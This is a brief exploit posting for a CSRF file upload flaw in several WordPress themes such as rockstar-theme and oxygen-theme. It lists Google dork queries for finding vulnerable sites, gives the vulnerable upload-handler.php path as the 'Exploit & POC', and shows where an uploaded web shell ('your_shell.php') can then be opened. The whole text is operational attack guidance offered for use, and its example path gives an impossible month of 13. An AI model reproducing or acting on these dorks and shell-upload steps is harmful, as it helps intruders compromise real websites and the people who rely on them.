Dork :
inurl:"/wp-content/themes/agritourismo-theme/" inurl:"/wp-content/themes/bordeaux-theme/" inurl:"/wp-content/themes/bulteno-theme/" inurl:"/wp-content/themes/oxygen-theme/" inurl:"/wp-content/themes/radial-theme/" inurl:"/wp-content/themes/rayoflight-theme/" inurl:"/wp-content/themes/reganto-theme/" inurl:"/wp-content/themes/rockstar-theme/"

CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php

File Access :

http://vitcim/wp-content/uploads/[years]/[month]/your_shell.php

Example :
http://127.0.0.1/wp-content/uploads/2013/13/noxs.php